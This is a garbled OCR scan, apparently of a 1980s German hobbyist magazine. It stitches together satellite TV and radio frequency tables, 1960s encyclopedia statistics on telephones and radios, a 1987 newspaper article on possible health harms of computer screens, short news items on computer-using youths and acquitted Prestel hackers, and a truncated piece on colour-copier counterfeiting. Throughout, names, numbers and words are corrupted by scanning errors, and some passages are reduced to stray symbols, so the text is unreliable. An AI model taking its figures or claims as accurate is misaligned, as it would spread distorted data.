Network/CNN. USA 


6.65 MHz 

6.65 MHz 


24 dBW 
26.5 dBW 


I-VA-Fl 1 

27.5 W 

61(1W} WS 

H-10.975 

30 

MTV Europa 

6,65 MHz 

44 dBW 

I-VA-Fl 1 

27,5 W 

61 (2W) WS 

H-11.015’ 

30 

Children’s Channel, UK 

6.60 MHz 

45 dBW 

I-VA-Fl 1 

27.5 W 

61 (2W) WS 

H-11.015 

30 

Premiere, UK 

6,60 MHz 

45 dBW 

t-VA-F11 

27,5 W 

63(3W) WS 

H11.135 

30 

Kindernet, Holland 

6,65 MHz 

44 dBW 

IVA-Fll 

27.5 W 

63(3W) WS 

H.11.135 

30 

Lifestyle 

6,60 MHz 

44 dBW 

I-VA-Fl 1 

27.5 W 

63(3W) WS 

H-11.135 

30 

Screen Sport 

6,60 MHz 

44 dBW 

l-VA-FII 

27 5 W 

63(4W) WS 

H-11,175 

30 

BBC 1/2 

6 65 MHz 

43 dBW 




I-VA-Fl 1 

27.5 W 

79{3E) 

ES 

V-l 1.470 

30 

EBU-PVS, Washington D.C, 

6.60 MHz 

41 dBW 

I-V-F4 

34,5 W 

53(10) 

Z/NE 

LH-3.9075 

20 

TVE-1, Spanien 

6.65 MHz 

21 dBW 

I-V-F4 

34,5 W 

24(14) 

EH 

RH-3.9795 

20 

TVE-2, Spanien 

6.60 MHz 

23 dBW 

I-V-F4 

34.5 W 

38(23) 

G 

RH-4.1665 

20 

zeitw. int. Video 
versch. 

6.60 oder 
6,65 MHz 

21 

dBW 

I-V-F4 

34.5 W 

38(24) 

G 

RH-4.1885 

20 

zeitw. int. Video 
versch. 

6.60 oder 
6.65 MHz 

21 

dBW 

l-V-FO 

53,0 W 

21(02) 

EH 

RH-3.7425 

20 

TV Portugal 

6.65 MHz 

26 dBW 

I-VF3 

53.0 W 

25(05) 

EH 

RH-3.798 

20 

TV Marocaine, Marokko 

SCPC 

24 dBW 

I-V-F3 

53.0 W 

38(24) 

G 

RH-4.175 

30 

ATC TV. Argentinien 

6.65 S/C 

26.5 dBW 























SA T-ßADIOPROGRAMME 


SA T-PADIOPROGRAMME 


Radioprogramme im Satband 10 


DIE SATELLITEN UND IHRE PROGRAMME 

im Satband 10,95 -11,7 GHz und 12,5 -12, 


GHz und 12,5 -12,75 GHz (Telecom) 


(alle aufgeführten Härfunkprogramme senden 24 Stunden täglich) 



BBC-WORLD SERVICE 
BBC-WORLD SERVICE 
BBC-WORLD SERVICE 
BBC-WORLD SERVICE 

CABLE ONE 

DEUTSCH LANDFUNK 

RADIO LUXEMBURG 

RADIO TEEN 

STAR SAT RADIO MÜNCHEN 
VOICE OF AMERICA 


I AQUARELLE 
RTL 

EUROPE 1 
EUROPE 2 
AFP 

RADIO NOSTALGIE 
PACIFIC FM 
SKY ROCK 
FUN FM 
RFM 

NRJ-RADIO ENERGIE 

RMC 

KISS FM 


ENGLISCH 

VERSCHIEDEN* 

ENGLISCH 

VERSCHIEDEN* 

ENGL./HOLLÄND. 

DEUTSCH 

DEUTSCH 

ENGL./HOLLÄND. 

DEUTSCH 

ENGLISCH 


FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 

FRANZÖSISCH 


EUTELSAT 1-F1. 13° OST 

EUTELSAT 1-FL 13° OST 

INTELSAT VA-Fll. 27.5° WEST 
INTELSAT VA-Fll, 27.5° WEST 

SUPER CHANNEL 

SUPER CH/J^NEL 

BBC1-2 F. DÄNEMARK 
BBC1-2 F. dXnEMARK 

EUTELSAT 1-F1. 13° OST 

3SAT ** 

INTELSAT VA-F12. 60° OST 

WDF3 

EUTELSAT 1-F1. 13° OST 

RTL PLUS 

EUTELSAT l-FI, 13° OST 

FILMNET 

EUTELSAT l-FI, 13° OST 

SAT 1 

EUTELSAT 1-F1. 13° OST 

SAT 1 

TELECOM 1A. 8° WEST 

M6 

TELECOM 1A. 8° WEST 

M6 

TELECOM 1A, 8° WEST 

M6 

TELECOM 1A. 8° WEST 

LACINQ 

TELECOM 1A. 8° WEST 

LA CINQ 

TELECOM 1A. 8° WEST 

LACINQ 

TELECOM 1A. 8° WEST 

/ 

TELECOM 1A, 8° WEST 

/ 

TELECOM 1A. 8° WEST 

/ 

TELECOM 1A, 8° WEST 

/ 

TELECOM 1A, 8» WEST 

l 

TELECOM 1A, 8° WEST 

l 

TELECOM 1A, 8° WEST 

l 


* einige Stunden täglich auch in deutscher Sprache 

Es werden auch noch 2 norwegische Programme über Etrteisai l-FS. 


VERTIKAL 

11.674 

7.380 MONO 

VERTIKAL 

11,674 

7,560 MONO 

HORIZONTAL 

11,175 

7.020 MONO 

HORIZONTAL 

11,175 

7.200 MONO 

HORIZONTAL 

11,174 

7,560 & 7,740 STEREO 

HORIZONTAL 

11,010 

7,020 & 7.200 STEREO 

VERTIKAL 

11.091 

7.020 & 7,200 STEREO 

VERTIKAL 

11,140 

7,920 STEREO 

VERTIKAL 

11,507 

7,380 & 7.560 STEREC 

VERTIKAL 

11,507 

7.020 & 7.200 STEREO 




VERTIKAL 

12.522 

6.200 & 7.400 STEREO 

VERTIKAL 

12.522 

6,500 & 7.750 STEREO 

VERTIKAL 

12,522 

6.850 & 8.200 STEREO 

VERTIKAL 

12,606 

6.200 & 7.400 STEREO 

VERTIKAL 

12,606 

7.750 MONO 

VERTIKAL 

12,606 

6.850 & 8.200 STEREO 

VERTIKAL 

12,648 

2.700 & 6.150 STEREO 

VERTIKAL 

12.648 

3.600 & 4.200 STEREO 

VERTIKAL 

12.648 

4.950 & 5.800 STEREO 

VERTIKAL 

12.648 

2.350 & 5.350 STEREO 

VERTIKAL 

12.648 

5.850 & 8.200 STEREO 

VERTIKAL 

12.648 

6.200 & 7.400 STEREO 

VERTIKAL 

12.648 

6.850 & 7.750 STEREO 





7® Ost aogestrahrt. jedoch in M-AC-OIGITAL. 









Countries Havlng More than 100,000 Tetephonet 

Telephonei in Service, 1965 
(Ooto portiolly earimoted) 


Per- Tel«- 
cent- phones 
□ge per 


Counfry 

Number 

of 

lolephonei 

crease 

ovor 

1955 

100 

pop. 

oIq- 

lion 

Algerio 

139,473 

35.4 

1.13 

Argentina 

1,472,132 

36.3 

6.64 

AmlroUo 

2,670,212 

80.9 

23.98 

Auslria 

936,207 

95,3 

12.99 

Belglum 

1,468,144 

76,8 

15.57 

Brazil 

1,263,072 

71.4 

1.60 

Bulgoria 

248,900 


3.04 

Conado 

7,021,000 

8*1 

36.12 

Chile 

249,582 

67.1 

2.89 

China, Communijl* 

244,028 


0.05 

Colombia 

409,589 

isoio 

3,63 

Cuba 

228,687 

60.6 

3.08 

Czechoilovakia 

1,398,509 

97.8 

9.91 

Danmoffc 

1,310,746 

51.5 

27.46 

Finlond 

778,101 

79.7 

16.92 

Formoja 

147,825 

250.2 

1.21 

FroncB 

5,703,878 

93.6 

11.71 

Gonmany, Eait 

1,586,838 

60.0 

9.33 

Germony, Weit 

8,168,168 

121.6 

13.93 

Greece 

431,292 

254.6 

5.06 

Hong Kong- 

219.693 

279.0 

5.87 

Hungory 

538,608 

65.1 

5.31 

Indio 

760,000 

209.2 

0.16 

Indoneila 

204,335 

180.4 

0.19 

Iran 

181,130 

207.0 

0,78 

Ircland 

203,900 

83.5 

7.14 

Israel 

215.020 

226.0 

8.51 


•1948. 

Sourcoj American Telephone and Telagroph 


Counfry 

Numbor 

of 

telophonas 

P&r- Tele- 
cenN phonos 
og« per 

jn. 100 

creose pop- 
ovsr ula- 
1955 lion 

Itoly 

5,528,751 

171.4 

10.54 

Japan 

12.250,841 

331.6 

12.54 

Karea, South 

232.901 

446.1 

0.83 

Malaysia 

121,066 


1.31 

Mexico 

725.072 

ib?!? 

1.80 

Morocco 

146,684 

35.0 

1.12 

Nelherlands 

2,180,273 

113.5 

17.85 

New Zcolond 

962,596 

94.0 

36.52 

Norway 

868.592 

51.7 

23.42 

Pokiiton 

120,525 

172.8 

0.12 

Peru 

132,367 

107.7 

1.15 

Phiilppines 

151,593 

182.0 

0.4B 

Polond 

- 1,193.362 

184.1 

3.81 

Porfußol 

521,921 

125.6 

5.72 

Puerto Rico 

186,948 

211.8 

7.20 

Rumonia 

426,502 


2.25 

South Africo 

1.133,331 

72!5 

6.40 

Spoin 

2.526.843 

1547 

8.03 

Sweden 

3,386,925 

61.5 

44.01 

Switzerland 

2,131,521 

86.7 

35.97 

Turkey 

306.100 

111.9 

0.99 

U.S.S.R, 

7,200,000 

140.8 

3.14 

United Arob Republic 301,405 


1.03 

United Kingdom 

9.960,000 

53*6 

18.27 

United Stales 

88,785.000 

60.1 

45.88 

Uruguay 

189,500 

65.8 

7.02 

Venezuela 

260,228 

149.0 

3.04 

Yugoslavia 

369,844 

130.3 

1.91 


I., 7h« WorJd'i Telephonat, I9SS ond 1965. 



Welt am Draht; Im Juli 1986 
waren 41,2 Mio. amerikani¬ 
sche Haushalte (47,8 %) an 
ein Kabeinetz angeschlos¬ 
sen. Ein Jahr zuvor waren es 
noch 5 % weniger. 


When you use the phone don't ever 
woste a wrong number. For instance, if 
. someone calls up and says, '*is Jack 
there?" don't say, ’i'm sorry, you have 
the wrong number." Say, "Hang on, l'll 
see. Who's calling?" Then wait a second. 

sorry, Jack doesn't want to talk to 
you. Jack is still very angry with you, 
and he doesn't want to discuss it.'V 



Encyclopädia Britannica 


Toble )|. 

Rodio ond Telovislon 
Receivers per 1,000 
Population, 1966 
Selected Couniries 


Covmtry 

Afghonisidr 

Algerla 

ArgenUna 

Abslrolio 

'Auslrla 

Belglum 

Bolivia 

Brazil 

Bulgorla 

Burma 

Combodlo 

Conodo 

Ceylon 

Chile 

China 

Colombia 

Congo 

Cuba 

Cyprui 

Czechosiovaklo 
Denmark 
Eciindot 
I iliiu|iiii 

linlactd 

Formoso 

Frone« 

Germany, East 

Germany, Weil 

Ghana 

Greece 

Hungory 

Indio 

Indonesto 

Iran 

Iroq 

lirosi 

Ilaly 

Japon 

Kenya 

Korea, North 

Korea, South 

Kuwait 

Lebanon 

Maloysia 

Mexico 

Morocco 

Netherlands 

New Zealand 

Nigerio 

Nerwoy 

Pokiiton 

Panoma 

Peru 

Philippinei 

Polond 

Perlugol 

Rhodesio 

Rumonia 

South Africo 

Spoln 

Süden 

Sweden 

Switzerlond 

Syria’ 

Tonzonia 

Thoilond 

Tuniiio 

Turkey 

U.S.S.R. 

U.A.R. 

U.K. 

u.s. 

Uruguoy 
Venezuelo 
Vietnam, Soulh 
Zombia 


Rodio* "ry 


20 

__ ■ 

173 

13.7 

317 

66.1 

662; 

2U.1 

317 

100,4 

421- 

153.8 

200 


118- 

29.5 

170 

22.8 

13 


63 


602 

25V.b 

37 


291 

V.8 

7 

.13 

221 

22.1 

13 

0.03 

166 

63.B 

226 

24.1 

232 

157.8 

357 

226.8 

177 

6 S 

Ü.IV 

7.1 

389 

15B.1 

111 

5.0 

387 

132.6 

352 

188.7 

337 

122.4 

65 

0.10 

165 

.41 

246 

81.8 

10 

__ 

27 

0.45 

91 

4.5 

121 

20.6 

235 

5.7 

212 

1204) 

334 

202.6 

53 

1.1 

13 


52 

‘iVs 

265 

79.9 

143 

59.6 

73 

12:2 

107 

28.8 

53 

23.3 

291 

180.9 

523 

154.2 

17 

0.52 

482 

131.1 

11 

0.02 

373 

58.3 

W2 

18.3 

60 

S.4 

14S 

65.7 

161 

19.6 

35 

9.0 

99 

23.4 

174 


251 

54.9 

22 

0.7 

398 

267.7 

459 

105.8 

195 

12.9 

14 


82 

8.2 

86 

1.2 

83 

0.04 

160 

60.4 

166 

U.o 

459 

275.6 

1,174 

357.4 

240 

67.3 

288 

60.9 

31 


26 

2.7 


*Doet not includo wirod 
speokers. 

Eovre, U.S. lnforn,<„io„ 
Agency, Reiearch Ond Rof, 
erence Service. 


Telecommunications 

Major developments in Communications in I960 in- 
jkjded: (1) the Start of worldwide commercial com- 


TV panel discussing nuclear weapon control on CBS via Early Bird 
Communications salellite on March 1,1966. Lefl, rrioderator 
Eric Sevareid in New York City; top lefl. British Minister of State 
Lord Chalfont in Geneva; top right, French Air Force Gen. 

P. Gallois (retired) in Paris; botlom left, formen West German 
Defense Minister F. Strauss in Munich; and bottom right, U.S. 
Sen. R. Kennedy in Washington, D.C. 


Bunicalions Services offered by the U.S.-controlled, 
iXcrnationally owned Communications Satellite 
Corp.; (2) progress in solving some of the serious 
Ciotlicts involved in imposing the revolutionary tech- 
lelogy of satellite Communications on the existing 
Uethods of Communications; (3) the first attempts to 
Inmslate the economies of satellite Communications 
|Bo lower international rates; (4) the Start of a na- 
flottal debate in the U.S. over financing educational 
television, possibly through economies expected from 
the use of Communications satellites; (S) heavy de- 
mands on Communications technology for meeting 
the requirements of the U.S. involvement in the war in 
South Vietnam; and (6) progress on new Systems to 
improve aircraft and ship Communications and navi- 




Table Tennis; 

>ee Sporting Record 

Taiwan; 

le« Formosa 


Tariffs; 


see Commercial 
Policies; Trade 
International 


Taxation: 

iee Government 
Finance 


Tea; 

jee Agriculture 




strahlende Computer 


Von Carola Schewe 


Ursulalrlearbeiteteaushilfsweise 
drei Stunden täglich an einem 
Computerbildschirm. Nach vier 
Wochen litt sie plötzlich unter 
Schlaflosigkeit, Herzrhythmus- 
störungenundseltsamenHautaus- 
schlägen nach dem Duschen. Sie 
gab den Zusatzverdienst wieder 
auf — und die Beschwerden ver¬ 
schwanden. Jetzt fürchtet sie, ih¬ 
ren angestammten Arbeitsplatz 
auch aufgeben zu müssen: auch 
dort werden demnächst Bild¬ 
schirme installiert. Nach einer 
Odyssee vom Haus- zum Zahn¬ 
arzt, über den Internisten zum 
Nervenarzt ist ihr klar: ihr fehlt 
sonst nichts. Aber Bildschirmar¬ 
beit verträgt sie nicht. Eine Be¬ 
rufsunfähigkeitsrente oder eine 
Entschädigung wegen einer Be¬ 
rufskrankheit darf sie aber nicht 
erwarten. Laut amtlicher Sprach¬ 
regelung können Bildschirmar¬ 
beitsplätze gar nicht krank ma¬ 
chen. 

Und wenn sie cs doch tun? Die 
Betroffenen machen EKGs und 
Allergietests, lassen sich Valium 
und Psychotherapie aufschwat¬ 
zen. „Alle Kolleginnen sehen ihre 
gesundheitlichen Störungen als 
persönliches Schicksal an und ha¬ 
ben sich damit abgefunden“, be¬ 
richtet eine Datentypistin. Behan¬ 
delnde Ärzteuntersuchen Körper¬ 
details — die Augen, den Unter¬ 
leib, die Nieren — und verneinen 
dann jeden Zusammenhang mit 
den .Arbeitsbedingungen. 

UrsulalrlehatsicheinerSelbst- 
hilfegruppe angeschlossen, die 
vor einigen Monaten von der Ma¬ 
schinenbautechnikerin Ingeborg 
May-Steinhausen gegründet 
wurde. Sie hatte teilweise ganz¬ 
tags am CAD-Bildschirm ge¬ 
zeichnet und Nieren- und Blasen¬ 
beschwerden davongetragen. Im 
Gegensatz zu vielen anderen 
suchte sie die „Schuld“ für ihre 
Krankheit nicht bei sich, sondern 
in ihren Arbeitsbedingungen. 
Und sie fand sich auch nicht ab. Sie 
kündigte. „Seit 26 Jahren bin ich 
im Arbeitsprozeß, ohneeinenTag 
arbeitslos gewesen zu sein. Da ich 
noch ca. 20 Jahre im Berufsleben 
zu stehen habe, möchte ich alles 
tun, um meinen Gesundheitszu¬ 
stand wieder herzustellen, ehe es 
zu spät ist“, schrieb sie in dem 


Brief ans Arbeitsamt. Ihre Gut¬ 
achten waren so überzeugend, daß 
das Arbeitsamt den Kündigungs¬ 
grundanerkannte. EinPräzedenz- 
fall. Bisher wurden ähnliche Be¬ 
gehren immer mit dem Hinweis 
auf den wissenschaftlichen Er¬ 
kenntnisstand vom Tisch ge¬ 
wischt. 

Noch Anfang Juni antwortete 
die Bundesregierung auf eine An¬ 
frage des SPD-Abgeordneten Ur- 
baniak: „Nach Kenntnis der Bun¬ 
desregierung hat bisher weltweit 
keine der abgeschlossenen wis¬ 
senschaftlichen Untersuchungen 
gesundheitsschädigende Auswir¬ 
kungen der Bildschirmarbeit 
nachgewiesen“. Das ist nicht 
falsch. Nachgewiesen, abgesi¬ 
chert durch eine genügend große 
Anzahl menschlicher Probanden, 
ist noch gar nichts. Wer hat schon 
Interesse, einer Zukunftstechno¬ 
logie nachzuweisen, daß sie die 
Gesundheit beeinträchtigt? Die 
Bundesregierungjedenfallsnicht. 
Sie behauptete zwar im letzten 
Jahr, auch das Arbeitsumfeld in 
Forschungsvorhaben zu neuen 
Technikeneinbeziehen zu wollen, 
lehnte aber jetzt eine spezielle 
Großfelduntersuchung ab. Das 
Institut für Strahlenhygiene des 
Bundesgesundheitsamtes bestritt 
in diesem Jahr einen Zusammen¬ 
hang zwischen Bildschirmarbeit 
und Schwangerschaftskomplika¬ 
tionen. Und ganz aktuell äußerte 
sich eine Ad-hoc-Arbeitsgruppe 
der Deutschen Gesellschaft fiir 
Arbeitsmedizin e.V. (einem sehr 
konservativen Berufsverband); 
Bildschirmarbeit könnezwarHal- 
tungsprobleme und Sehstörungen 
mit sich bringen. Aber alle ande¬ 
ren Befürchtungen entbehrten je- 
derGrundlage. Diese Grundlagen 
zu schaffen, istdasHauptanliegen 
des Informationsbüros May- 
Steinhausen. 


Die Anfrage des Abgeordneten 
und der harsche Ton der Arbeits¬ 
medizinerhabendengleichen An¬ 
laß; Es gibt ein neues Gutachten, 
das die festgefahrene Diskussion 
wieder in Schwungbringt. Dr. Ute 
Boikat, Richard Donderer und 
Roland Kollert stellten im Auftrag 
einer Computerzeitschrift den in¬ 


ternationalen Erkenntnisstand 
zum Thema „Biologische Effekte 
elektromagnetischer Strahlung 
von Computer-Bildschirmen“ zu¬ 
sammen und maßen erstmals die 
konkreten Werte von 16 Home- 
und Personal-Computern. 

Daß es einem nach Bildschirm¬ 
arbeiten vor den Augen flimmert, 
daßman nachts weniger sieht, daß 
Daten-Tippsen unter verspann¬ 
tem Nacken leiden — das bestrei¬ 
tet heute kaum noch j emand. Aber 
schon bei der Frage der Röntgen¬ 
strahlung, die aus den Geräten 
austritt, scheiden sich dieGeister. 
Es gibt schwedische und kanadi¬ 
sche Untersuchungen, die eine 
Gefährdung von Föten und 
Schwangeren für wahrscheinlich 
halten. Eine finnische Studie fand 
dafür keine Beweise. 

Aber die Langzeilwirkungen 
geringer Röntgenstrahlung sind 
nicht ausreichend erforscht. Seit 
die Diskussion darüber gegen 
Ende der siebziger Jahre breites 
öffentliches Interesse fand, haben 
sich die Computerhersteller mit 
Erfolg bemüht, die Röntgenstrah¬ 
lung ihrer Geräte zu minimieren. 

Die neuesten Forschungen im 
Ausland und auch das Gutachten 
von Boikat und Co. beschäftigen 
sich mit einer anderen Art von 
Strahlung: der elektromagneti¬ 
schen, diealleelektrischen Geräte 
erzeugen. Die Wechselströme , 
die sie in menschlichen Körpern 
hervorrufen, sind sehr schwach — 
niederfrequent und damit lang¬ 
weilig. Akut passiert deshalb 
nichts Besonderes. Neben einem 
elektrischen Föhn zu stehen, läßt 
einenja auch nicht plötzlich krank 
werden. Aber der sogenannte 
Elektro-Smog ist bereits ein viel¬ 
diskutiertes Problem: Menschen 
schlafenschlechtunter Hochspan¬ 
nungsleitungen; Herzschrittma¬ 
cher versagen in der Nähe von 
Starkstromkabeln; Säuglinge 
werden unruhig neben Elektro¬ 
herden. 

Bei Bildschirmen werden diese 
elektromagnetischen Felder ge¬ 
pulst, d.h.biszusechzlgMalinder 
Sekunde an- und ausgeschaltet. 
Das verstärkt deren Wirkung 
enorm. Wenn die Frequenz dieser 
elektromagnetischen Strahlung 
diejenige beeinflußt, mit der die 


^ 33 

3r Cb 
33 

33- 

CT ^ 

Cb' Cb' 

^ § 

r-i-‘ 

ty'. o?' 

=3 ^ 


Cb 


Cd 

33' 

33 

Cb 

C; 

Cb 




Liebesgrüße per Diskette, strahlende Gesichter 


ein Bildschirmarbeitsplatz in der Computerwerbung 


Foto: taz-Archiv 


Zellmembranen im Körper mit¬ 
einander „flüstern“, können die 
Zellen in ihrer Funktion gestört 
werden. Äußerlich meßbar ist 
dann der Verlust von Calcium aus 
den Zellen. Kalk ist für die Reiz¬ 
übertragung äußerst wichtig. 

Wie die Störungen ablaufen, 
und ob elektromagnetische Strah¬ 
lung etwa auch Krebs hervorru fen 
kann, erforscht zur Zeit das US- 
amerikanische „National Council 
of Radiation Protection“. Und 
auch aus anderen Ländern, vor al - 
lern ausdem Ostblock, liegen Stu¬ 
dien mit Anhaltspunkten dafür 
vor, daß die Wirkung elektroma¬ 
gnetischer Strahlung schon bei 
Null beginnt. Anhaltspunkte da¬ 
für, daß Bildschirmarbeit auf je¬ 
den Fall gefährlich ist. 

Dies ist der Punkt, der die Ar¬ 
beitsmediziner, die sich der Indu¬ 
strie verpflichtet sehen, sogarstig 
werden läßt. Jeder Bildschirm 
sendet elektromagnetische Strah¬ 
lung aus. Die meisten sorgen mit 
ihren clektromagneti sehen Entla¬ 
dungen außerdem für ein regel¬ 
rechtes Staubpartikel-Bombarde¬ 
ment auf die Haut der Benutzerin¬ 
nen — ein weiteres Phänomen, 
dessen gesundheitliche Folgen 
noch nicht erforscht sind. 

Bei ihrem Warentest fanden 
Boikat/Donderer/Kollert keinen 
Computer, den sie bedenkenlos 
empfehlenkönnten. GuteWertein 
einem Meßbereich wurden meist 
durch miserable in einem anderen 
zunichte gemacht. Strahlungs¬ 
arme Bildschirme mit Flüssigkri¬ 
stall- oder Plasma-Technik wer¬ 
den frühestens in sechs Jahren 
marktreif. Ein provisorischer Fil¬ 


ter, Erdung und Ummantelung 
können allerdings die Strahlung 
um bis zu neunzig Prozent verrin¬ 
gern. 

Dr. Ute Boikat weiß, mit wel¬ 
chen Gegnern sie es zu tun hat. 
„Die greifen mich leidenschaft¬ 
lich an“, meint sie ein wenig 
furchtsam. Und sie findet auch, 
daß ihre Ergebnisse nur ein An¬ 
fangseinkönnen, um weiterzufor¬ 
schen. 


Bleiben noch die Gewerkschaf¬ 
ten. Sindsie zu arm, umeigeneex- 
perimentelle Studien in Auftragzu 
geben? Oder liegt ihr mangelndes 
Engagement darin begründet, daß 
vor Bildschirmen meist Frauen 
sitzen? Während Frauen oft acht 
Stunden täglich auf den Monitor 
starren müssen, haben Männer 
meist Mischarbeitsplätze. Sabine 
Kaiser, zuständig beim DGB- 
Bundesvorstand, findet, daß die 
Gewerkschaften sehr wohl aktiv 
sind in diesem Punkt — aber man 
verfüge halt über so wenig abgesi¬ 
cherte Erkenntnisse... 

Ihr nächster wichtiger Termin 
ineinerPolitikderkleinenSchritte 
ist die Herbstsitzung eines berufs¬ 
genossenschaftlichen Fachaus¬ 
schusses,deru.a. Regelwerkezur 
Vorbeugung gegen Unfälle und 
Berufskrankheiten erarbeitet. Für 
Bildschirmarbeitsplätze gibt es 
bisher nur sogenannte „Sicher¬ 
heitsregeln“, die keine Gesetzes¬ 
kraft haben. Ansonsten gelten die 
Vorschriften für den Strahlen¬ 
schutz. Der DGB möchte eine 
rechtsverbindliche „Unfallver¬ 
hütungsvorschrift“ erstellt wis¬ 


Mit freundlicher Genehmigung der "taz" entnommen 


sen, mit folgenden Inhalten: 

► Als Bildschirmarbeitsplätze im 
Sinne der Vorschrift sollen die 
gelten, an denen jemand am Ter¬ 
minal sitzt — und sei es auch nur 
eine halbe Stunde am Tag. Bisher 
galt die Definition nur für „über¬ 
wiegende“ Tätigkeit am Compu¬ 
ter —ein beliebtes Schlupfloch für 
die Arbeitgeber. 

► Herabsetzung der Grenzwerte 
und Zuschnitt auf die Situation an 
den Monitoren. Ziel; auch Lang¬ 
zeitschäden sollen vermieden 
werden. 

► Die Hersteller sollen dazu ge¬ 
zwungen werden, jede Art von 
Strahlenbelastungzuminimieren, 
also Ummantelungen und Filter 
schon im Werk einbauen. 

^ Schwangere sollen aufWunsch 
einen anderen Arbeitsplatz be¬ 
kommen. 


zer/innenfreundlich gestaltet 
sein. 

Die Berufsgenossenschaften 

sind partitätisch mit Arbeitgebern 
und Gewerkschaften besetzt. Sa¬ 
bine Kaiser wirdalso Mühe haben 
ihre Forderungen durchzusetzen.’ 

Betroffene, die sich im Betrieb 
engagieren, haben dennoch ganz 
gute Chancen, sich selbst zu hel¬ 
fen, Ein Mitglied der Selbsthilfe¬ 
gruppe erkämpfte sich einen bild- 
schimnfreien Arbeitsplatz mit Un¬ 
terstützung des Werksarztes. „Er 
batmich, keinem zu erzählen, daß 
diese Störungen von der Arbeit am 
Bildschirm kommen“, gab er zu 
Protokoll. Und Ingeborg May- 
Steinhausen weiß, daß zehn wei¬ 
tere Kolleginnen nach ihr kündig¬ 
ten. Dem Chef war das eine War¬ 
nung; er versprach Verbesserun¬ 
gen. 


Software soll möglichst benut- 


1) Das Boikai-Guiachicn ist in 
popuIärwisscnschafUicher 
Form nachzuiesen in der Juni* 
Ausgabe des P.M.-Compulcr- 
hefts. Bestellung pcrEinzahlung 
von DM 7,50 auf Konto Nr. 
7115-203 Po.MgiTD Hamburg. 

2) Informationsstelle inge¬ 
borg May-Steinhausen. Brük- 
kenstr. 50. 6000 Frankfurt 70. 
Tel.: 069/61 47 07. Ein Frage¬ 
bogen wird gerne an Betroffene 
verschickt. 


3) Die Stellungnahme der 
Deutschen Gesellschaft für Ar- 
beitsmeduin e.V. erscheint in 
derNr. 7der Zeitschrift für Ar- 
beitsnftedizin. Sozialmedizin, 
Praventivmedizin, Der Be- 
irid)sarzt. Center Verlag, Stutt¬ 
gart. 

4) Di« Firma .Logo Compu¬ 
ter" stellt slle Alten von Bild- 


schirmfillcrn her (vom hilltgn 
Nylon-Filter gegen Flimmern 
bis zu Metallfiltcrn für militäri¬ 
sche Zwecke). Sic . ein' 
deutsche Hersteller für Carbon- 
filicr gegen elektromagnetische 
Strahlung. Tel.: 

089/59 61 34/5. Bayerstr. 2. 
8(XX) München 2 

5) AuchAlu-odcrKupferfoIie 
hilft Strahlung verringern. Es 
bcstehiaberdicGcfahrdcrÜbcr- 
hitzung des Computers bei un¬ 
sachgemäßer Montage. 

6) Computer der Firma Mc- 
nicirex sind angeblich mit Filter 
und Erdungssicllc ab Werk lie¬ 
ferbar. DieskandinavischcFima 
Nokia stellt strcustrahlungs- 
annc Bildschirme her. 

7) Die »Sichcrhciisregeln für 
Bildschirmarbeitsplätze“ müß- 


• ivuo.ai iiiiucii. uegen ein< 
ringe Gebühr verschickt si 

Verwaitungs-Bc rufsgenoss 

Schaft, Postfach so 21 
2(X)0 Hamburg 60 , 


Obiger Artikel erschien 
am 30. Juli 1987 ir, 
"tageseeuung". Die Auio- 
rin hol imwischen ein 
Buch über das Thema ge¬ 
schrieben. Es erschein, 
wahrscheinlich im Januar 
1989 unter dem Titel 

"Krank durch Computer,- 
Die neue Volkskrankheit 

and was Sie dagegen tun 
können" im Rowohlt Ver¬ 
lag. 


Computerkids 
„ganz normal“ 

Computerkids sind .ganz normale Ju¬ 
gendliche und keine vereinsamten 
Sonderlinge*. Das Ist das Ergebnis ei¬ 
ner Umfrage der Computerzeltschrif¬ 
ten CHIP und HC. Von 3000 Befragten 
konnte fast jeder zweite (46 Prozent) 
durch sein Computer-Hobby sogar 
neue Freunde dazugewinnen, Gerade 
sechs Prozent haben Freundschaften 
zugunsten neuer aufgegeben, nur bei 
drei Prozent wurde der Freundeskreis 
kleiner. 

Auch die Beziehungen zum anderen 
Geschlecht leiden kaum unter der 
Bildschirm-Begeisterung. Von gemein¬ 
samer Interessenlage kann allerdings 
weniger die Rede sein; Neun Prozent 
der jeweiligen Partner/innen lehnten 
den Computer, entschieden ab, fast die 
Hälfte der Freunde/Freundinnen von 
Computerfreaks stehen dem Hobby 
des Partners/der Partnerin eher 
gleichgültig gegenüber. Gerade acht 
Prozent sind ebenfalls vom Partner- 
Hobby begeistert. Das restliche Viertel 
ist .eher positiv* eingestellt. 

Oie Beschäftigung mit dem Computer 
wird von den Jugendlichen nicht nur 
als Freizeitsport betrieben. Die gro8e 
Mehrheit der Befragten (82 Prozent) 
entarten sich auch schulische Vorteile 
davon. Jeder Vierte (28 Prozent) rech¬ 
net mit besseren Berufschancen. 

Von den CHIP/HC-Fragebögen wur¬ 
den gerade vier Prozent von Mädchen 
oder jungen Frauen zurückgeschickt. 

QueUe: ddp AprU/es 

US-Kids: 
eher lustlos 

Kinder zwischen acht und dreizehn 
Jahren haben, zumindest in den USA, 
kein besonders enges Verhältnis zum 
Computer. Sie meiden den Bildschirm 
in Ihrer Freizeit und halten Abstand zu 
den. computerbesessenen Altersge¬ 
nossen. Zu diesen Ergebnissen 
kommt eine Studie der University of 
California. Resümee; .Dia' vermutete 
Entwicklung zu Computerklndom hat 
nicht Btattgefunden.* 

Gerade die Hälfte der befragten Drei¬ 
zehnjährigen etwa weis, wie ein Com¬ 
puter funktioniert. Und dies, obwohl 
ihre Schule entsprechende Kurse an¬ 
bietet Nicht einmal jeder dritte von ih¬ 
nen will als Erwachsener etwas mit 
Computern zu tun haben. 

QueUe: SPIEGEL 44/85 


Hacker freigesprochen 

London, (dpa) Das britische Oberhaus 
als oberste Berufungsinstanz hat zwei so¬ 
genannte Hacker, die sich Zugang zu dem 
Computer-Informationssystem „Prestel“ 
verschafft hatten, freigesprochen. Nach 
Ansicht der Lords stellte das Anzapfen 
der Datenbank keinen kriminellen Akt 
dar. Den beiden Angeklagten sei es nicht 
um Geldgewiim, sondern um die Demon¬ 
stration ihrer Fähigkeiten, als Hacker ge¬ 
gangen, meinten die Lord-Richter. 

2.1.M. 


Ein (Alp-)Traum wild wahr: 
Geid aus dem Kopierer 

Super-Kopierer produziert täuschend echt Blüten / Polizei ist hilflos 


Frankfurt - „Der Wunschtraum der farbigen Kopie 
geht in Erfüllung.“ So wirbt der japanische Konzern 
